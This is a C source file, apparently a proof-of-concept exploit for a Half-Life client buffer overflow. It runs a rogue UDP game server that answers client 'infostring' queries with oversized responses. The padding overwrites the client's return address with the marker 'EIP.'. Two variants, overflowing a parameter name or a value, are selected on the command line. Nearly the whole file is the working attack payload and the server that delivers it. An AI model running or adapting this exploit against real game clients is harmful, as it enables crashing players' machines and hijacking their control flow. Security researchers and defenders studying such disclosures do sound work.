
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. #ifdef WIN
  6.     #include <winsock.h>
  7.     #include "winerr.h"
  8.  
  9.     #define    close    closesocket
  10. #else
  11.     #include <unistd.h>
  12.     #include <sys/socket.h>
  13.     #include <sys/types.h>
  14.     #include <arpa/inet.h>
  15.     #include <netdb.h>
  16. #endif
  17.  
  18.  
  19.  
  20. #define VER        "0.1"
  21. #define PORT    27015
  22. #define BUFFSZ    2048
  23.  
  24.  
  25.  
  26. /* QUERIES */
  27. #define PING    "ping"
  28. #define INFOS    "infostring"
  29. #define INFO    "info"
  30. #define DET     "details"
  31. #define CHALL    "getchallenge"
  32. #define PLAY    "players"
  33. #define RULES    "rules"
  34. #define RCON    "challenge rcon"
  35. #define CONN    "connect"
  36.  
  37.  
  38. /* ANSWERS */
  39. #define INFOS1P    "\xff\xff\xff\xff" \
  40.         "infostringresponse\x00" \
  41.         "\\" \
  42.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  43.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  44.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  45.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  46.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  47.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  48.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  49.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  50.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  51.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  52.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  53.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  54.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  55.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  56.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  57.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  58. /* EIP */    "EIP." \
  59.         "\\0" \
  60.         "\\protocol\\46" \
  61.         "\\address\\1.2.3.4:27015" \
  62.         "\\players\\3" \
  63.         "\\proxytarget\\0" \
  64.         "\\lan\\0" \
  65.         "\\max\\16" \
  66.         "\\gamedir\\valve" \
  67.         "\\description\\Half-Life" \
  68.         "\\hostname\\Test" \
  69.         "\\map\\map" \
  70.         "\\type\\l" \
  71.         "\\password\\0" \
  72.         "\\os\\w" \
  73.         "\\secure\\0" \
  74.         "\x00"
  75.  
  76. #define INFOS1V    "\xff\xff\xff\xff" \
  77.         "infostringresponse\x00" \
  78.         "\\hostname\\" \
  79.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  80.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  81.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  82.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  83.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  84.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  85.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  86.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  87.         "aaaaaaaaaaaaaaaa" \
  88. /* EIP */    "EIP." \
  89.         "\\protocol\\46" \
  90.         "\\address\\1.2.3.4:27015" \
  91.         "\\players\\3" \
  92.         "\\proxytarget\\0" \
  93.         "\\lan\\0" \
  94.         "\\max\\16" \
  95.         "\\gamedir\\valve" \
  96.         "\\description\\Half-Life" \
  97.         "\\hostname\\Test" \
  98.         "\\map\\map" \
  99.         "\\type\\l" \
  100.         "\\password\\0" \
  101.         "\\os\\w" \
  102.         "\\secure\\0" \
  103.         "\x00"
  104.  
  105. #define PING1    "\xff\xff\xff\xff" \
  106.         "j\x00"
  107.  
  108. #define PLAY1    "\xff\xff\xff\xff" \
  109.         "D" \
  110. /* players */    "\x03" \
  111.         "\x01" "player1\0" "\x04\x00\x00\x00" "\xff\xff\xff\xff" \
  112.         "\x02" "player2\0" "\x06\x00\x00\x00" "\xff\xff\xff\xff" \
  113.         "\x03" "player3\0" "\x09\x01\x00\x00" "\xff\xff\xff\xff"
  114. //        |      |           |                  |
  115. //        |      |           |                  total time in-game
  116. //        |      |           number of frags
  117. //        |      player name
  118. //        player ID
  119.  
  120. #define RULES1    "\xff\xff\xff\xff" \
  121.         "E" \
  122. /* rules */    "\x2b\x00" \
  123.         "mp_logfile\0" "1\0" \
  124.         "deathmatch\0" "1\0" \
  125.         "coop\0" "0\0" \
  126.         "pausable\0" "0\0" \
  127.         "sv_voiceenable\0" "1\0" \
  128.         "mp_consistency\0" "1\0" \
  129.         "sv_contact\0" "contactme\0" \
  130.         "sv_proxies\0" "1\0" \
  131.         "sv_password\0" "0\0" \
  132.         "sv_aim\0" "0\0" \
  133.         "sv_gravity\0" "800\0" \
  134.         "sv_friction\0" "4\0" \
  135.         "edgefriction\0" "2\0" \
  136.         "sv_stopspeed\0" "100\0" \
  137.         "sv_maxspeed\0" "270\0" \
  138.         "mp_footsteps\0" "1\0" \
  139.         "sv_accelerate\0" "10\0" \
  140.         "sv_stepsize\0" "18\0" \
  141.         "sv_clipmode\0" "0\0" \
  142.         "sv_bounce\0" "1\0" \
  143.         "sv_airmove\0" "1\0" \
  144.         "sv_airaccelerate\0" "10\0" \
  145.         "sv_wateraccelerate\0" "10\0" \
  146.         "sv_waterfriction\0" "1\0" \
  147.         "sv_clienttrace\0" "3.5\0" \
  148.         "sv_cheats\0" "0\0" \
  149.         "sv_allowupload\0" "1\0" \
  150.         "sv_minrate\0" "0\0" \
  151.         "sv_maxrate\0" "0\0" \
  152.         "mp_teamplay\0" "0\0" \
  153.         "mp_fraglimit\0" "20.000000\0" \
  154.         "mp_timelimit\0" "20.000000\0" \
  155.         "mp_fragsleft\0" "9999\0" \
  156.         "mp_timeleft\0" "1088\0" \
  157.         "mp_friendlyfire\0" "1\0" \
  158.         "mp_falldamage\0" "1\0" \
  159.         "mp_weaponstay\0" "1\0" \
  160.         "mp_forcerespawn\0" "1\0" \
  161.         "mp_flashlight\0" "1\0" \
  162.         "mp_autocrosshair\0" "0\0" \
  163.         "decalfrequency\0" "30\0" \
  164.         "mp_teamlist\0" "hgrunt;scientist\0" \
  165.         "mp_allowmonsters\0" "0\0" \
  166.         "mp_chattime\0" "10\0"
  167. //        |           |    | |
  168. //        |           |    | NULL
  169. //        |           |    rule value
  170. //        |           NULL
  171. //        rule name
  172.  
  173. #define CHALL1    "\xff\xff\xff\xff" \
  174.         "A00000000 123456789 2\n\x00"
  175. //                   |
  176. //               challenge key
  177.  
  178. #define DET1    "\xff\xff\xff\xff" \
  179.                 "m" \
  180. /* IP&port */   "1.2.3.4:27015\0" \
  181. /* hostname */    "Test\0"\
  182. /* mapname */    "map\0"\
  183. /* gamedir */    "valve\0"\
  184. /* descr */     "Half-Life\0"\
  185. /* clients */    "\x03" \
  186. /* maxclients*/    "\x10" \
  187. /* protocol */    "\x2e" \
  188. /* type */      "l" \
  189. /* OS */        "w" \
  190. /* passwordd */    "\x00" \
  191. /* mod run */    "\x00" \
  192.             "\x00"
  193.  
  194. #define CONN1    "\xff\xff\xff\xff" \
  195.         "B" \
  196.         "4294967371 3 \"1.2.3.4:27005\"\0"
  197.  
  198.  
  199. #define BUGNUM  "" \
  200. "1 = Parameter buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n" \
  201. "2 = Value buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n"
  202.  
  203.  
  204.  
  205.  
  206.  
  207. void show_dump(unsigned char *buff, unsigned int buffsz);
  208. void std_err(void);
  209.  
  210.  
  211.  
  212.  
  213.  
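/*
 * Canned replies for the fixed-content queries.  Each entry pairs the query
 * text that follows the 4-byte 0xff header with the label logged when it is
 * seen and the response sent back.  Order matches the original if-chain.
 */
struct canned_reply {
    const char *query;
    size_t      qlen;
    const char *label;
    const char *reply;
    size_t      rlen;
};

static const struct canned_reply canned[] = {
    { PING,  sizeof(PING)  - 1, "PING\n",         PING1,  sizeof(PING1)  - 1 },
    { PLAY,  sizeof(PLAY)  - 1, "PLAYERS\n",      PLAY1,  sizeof(PLAY1)  - 1 },
    { RULES, sizeof(RULES) - 1, "RULES\n",        RULES1, sizeof(RULES1) - 1 },
    { CHALL, sizeof(CHALL) - 1, "GETCHALLENGE\n", CHALL1, sizeof(CHALL1) - 1 },
    { DET,   sizeof(DET)   - 1, "DETAILS\n",      DET1,   sizeof(DET1)   - 1 },
};

/*
 * Returns non-zero when the datagram (buff, len) carries the 4-byte 0xff
 * header followed by `query` (qlen bytes).  Datagrams shorter than the
 * header plus the query text are rejected instead of being read past `len`.
 */
static int is_query(const unsigned char *buff, int len, const char *query, size_t qlen) {
    return len >= 4 && (size_t)(len - 4) >= qlen && memcmp(buff + 4, query, qlen) == 0;
}

/*
 * Best-effort delivery of a reply: a failed sendto() is reported on stderr
 * but does not terminate the receive loop.
 */
static void send_reply(int sd, const char *data, size_t len, const struct sockaddr_in *to, int tolen) {
    if(sendto(sd, data, len, 0, (const struct sockaddr *)to, tolen) < 0) {
        fputs("warning: sendto failed, reply not delivered\n", stderr);
    }
}

/**
 * Entry point.  Binds a UDP socket on the chosen port and answers Half-Life
 * client queries with the canned server responses defined above; the reply
 * to "infostring" is one of the two oversized INFOS1P/INFOS1V strings,
 * selected by argv[1].
 *
 * argv[1]  bug number: '1' (INFOS1P) or '2' (INFOS1V), see BUGNUM
 * argv[2]  optional listening port, default PORT (1..65535)
 *
 * Returns 0 only in theory (the receive loop never exits); exits with
 * status 1 on usage errors and through std_err() on socket failures.
 */
int main(int argc, char *argv[]) {
    int                 sd,
                        err,
                        plen;
    size_t              infostrlen;
    unsigned short      port = PORT;
    struct sockaddr_in  peerc,
                        peers;
    unsigned char       buff[BUFFSZ];
    const char         *infostr;
    size_t              i;


    fputs("\n"
        "Half-Life <= 1.1.1.0 passive buffer-overflow test "VER"\n"
        "by Auriemma Luigi\n"
        "e-mail: aluigi@pivx.com\n"
        "web:    http://www.pivx.com/luigi/\n"
        "\n", stdout);


    if(argc < 2) {
        printf("\nUsage: %s <bug_num> [listening_port(%hu)]\n"
            "\n\nbug_num:\n\n"
            BUGNUM
            "\n", argv[0], PORT);
        exit(1);
    }


    switch(argv[1][0]) {
        case '1':
            infostr    = INFOS1P;
            infostrlen = sizeof(INFOS1P) - 1;
            break;
        case '2':
            infostr    = INFOS1V;
            infostrlen = sizeof(INFOS1V) - 1;
            break;
        default:
            fputs("\nError: You must chose the bug number:\n\n"
                BUGNUM
                "\n", stdout);
            exit(1);
    }

    if(argc > 2) {
        /* atoi() silently accepts junk and out-of-range values; validate instead */
        char *end = NULL;
        long  p   = strtol(argv[2], &end, 10);
        if(end == argv[2] || *end != '\0' || p < 1 || p > 65535) {
            fprintf(stderr, "\nError: invalid listening port \"%s\"\n", argv[2]);
            exit(1);
        }
        port = (unsigned short)p;
    }


#ifdef WIN
    WSADATA    wsadata;
    err = WSAStartup(MAKEWORD(2,0), &wsadata);
    /* WSAStartup reports failure with a non-zero error code, not a negative value */
    if(err != 0) std_err();
#endif


    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    /* zero the whole struct so sin_zero is not left uninitialised */
    memset(&peers, 0, sizeof(peers));
    peers.sin_family      = AF_INET;
    peers.sin_addr.s_addr = htonl(INADDR_ANY);
    peers.sin_port        = htons(port);

    err = bind(sd, (struct sockaddr *)&peers, sizeof(peers));
    if(err < 0) std_err();


    printf("\nListening on UDP port %u\n\n"
        "NOTE: use a debugger to see the exception and the overwritten EIP\n\n",
        port);


    for(;;) {
        /* recvfrom() may shrink plen, so reset it before every call */
        plen = sizeof(peerc);
        /* leave one byte free so the terminator below never writes past buff */
        err = recvfrom(sd, buff, BUFFSZ - 1, 0, (struct sockaddr *)&peerc, &plen);
        if(err < 0) std_err();
        buff[err] = 0x00;


        printf("%s:%u = ",
            inet_ntoa(peerc.sin_addr),
            ntohs(peerc.sin_port));

        /* --- */

        if(is_query(buff, err, INFOS, sizeof(INFOS) - 1)) {
            fputs("INFOSTRING (buffer-overflow)\n", stdout);
            send_reply(sd, infostr, infostrlen, &peerc, plen);
            continue;
        }

        for(i = 0; i < sizeof(canned) / sizeof(canned[0]); i++) {
            if(is_query(buff, err, canned[i].query, canned[i].qlen)) break;
        }
        if(i < sizeof(canned) / sizeof(canned[0])) {
            fputs(canned[i].label, stdout);
            send_reply(sd, canned[i].reply, canned[i].rlen, &peerc, plen);
            continue;
        }

        if(is_query(buff, err, CONN, sizeof(CONN) - 1)) {
            /* the connect string is client-supplied: dump it instead of
             * writing the raw bytes to the terminal */
            fputs("CONNECT:\n", stdout);
            show_dump(buff + 4, (unsigned int)(err - 4));
            send_reply(sd, CONN1, sizeof(CONN1) - 1, &peerc, plen);
            continue;
        }

        fputs("Unknown data:\n", stdout);
        show_dump(buff, (unsigned int)err);
    }

    /* not reached while the loop above runs forever; kept for symmetry */
    close(sd);
    return 0;
}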
  348.  
  349.  
  350.  
  351.  
  352.  
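/*
 * Emit one line of the hex dump: `len` (<= 16) bytes as "hh " groups, the hex
 * column padded to a fixed width of 50 characters (16 * 3 + 2), then the same
 * bytes as ASCII with anything outside 0x21..0x7e shown as '.'.
 */
static void dump_line(const unsigned char *p, unsigned int len) {
    static const char hex[] = "0123456789abcdef";
    char          line[80];     /* 50 + 16 + '\n' + '\0' = 68, so 80 is enough */
    char         *out = line;
    unsigned int  k;

    for(k = 0; k < len; k++) {
        *out++ = hex[p[k] >> 4];
        *out++ = hex[p[k] & 0xf];
        *out++ = ' ';
    }
    /* pad partial lines so the ASCII column always starts at the same place */
    while(out - line < 50) *out++ = ' ';
    for(k = 0; k < len; k++) {
        /* these bytes come straight off the network: only printable 7-bit
         * ASCII reaches the terminal, control and high bytes are masked */
        *out++ = (p[k] > 0x20 && p[k] < 0x7f) ? (char)p[k] : '.';
    }
    *out++ = '\n';
    *out   = '\0';
    fputs(line, stdout);
}

/**
 * Hex+ASCII dump of buffsz bytes at buff to stdout, 16 bytes per line with a
 * shorter final line for the remainder.  A buffsz of 0 prints nothing.
 */
void show_dump(unsigned char *buff, unsigned int buffsz) {
    unsigned int off = 0;

    /* written as a subtraction so buffsz close to UINT_MAX cannot wrap */
    while(buffsz - off >= 16) {
        dump_line(buff + off, 16);
        off += 16;
    }
    if(off < buffsz) dump_line(buff + off, buffsz - off);
}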
  416.  
  417.  
  418.  
  419.  
  420.  
  421. #ifndef WIN
    /*
     * Fatal-error exit used by the socket calls in main(): prints the last
     * errno as "Error: <message>" on stderr and terminates with status 1.
     * Never returns.
     */
    void std_err(void) {
        const char *prefix = "\nError";
        perror(prefix);
        exit(1);
    }
  426. #endif
  427.  
  428.  
  429.